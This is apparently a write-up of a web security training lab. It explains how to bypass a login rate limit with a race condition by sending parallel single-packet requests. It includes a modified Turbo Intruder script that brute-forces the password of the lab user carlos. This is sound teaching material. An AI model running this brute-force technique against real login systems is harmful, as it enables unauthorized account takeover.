Bypassing rate limits via race conditions

Description

This lab's login mechanism uses rate limiting to defend against brute-force attacks. However, this can be bypassed due to a race condition.

To solve the lab:

1. Work out how to exploit the race condition to bypass the rate limit.

2. Successfully brute-force the password for the user carlos.

3. Log in and access the admin panel.

4. Delete the user carlos.

You can log in to your account with the following credentials: wiener:peter.

Approach

Upon analyzing the login functionality, I observed that the system blocks further attempts after three failed login attempts.

Sending the POST /login request to repeater, I created a Tab Group containing 20 requests. Testing various group sending methods (parallel, sequential), I discovered that sending requests in parallel (single-packet attack) didn't trigger the blocking mechanism.

Utilizing the Turbo Intruder extension with the "race-single-packet-attack.py" script, I made slight modifications.

def queueRequests(target, wordlists):

    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )
    passwords = wordlists.clipboard

    for password in passwords:
        engine.queue(target.req, password, gate='1')

    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)

After copying the password wordlists to my clipboard, I launched the attack.

Upon completion, I observed a 302 response, indicating success. Logging in with the discovered password "shadow," I accessed the admin panel and promptly deleted the user "carlos," thus solving the lab.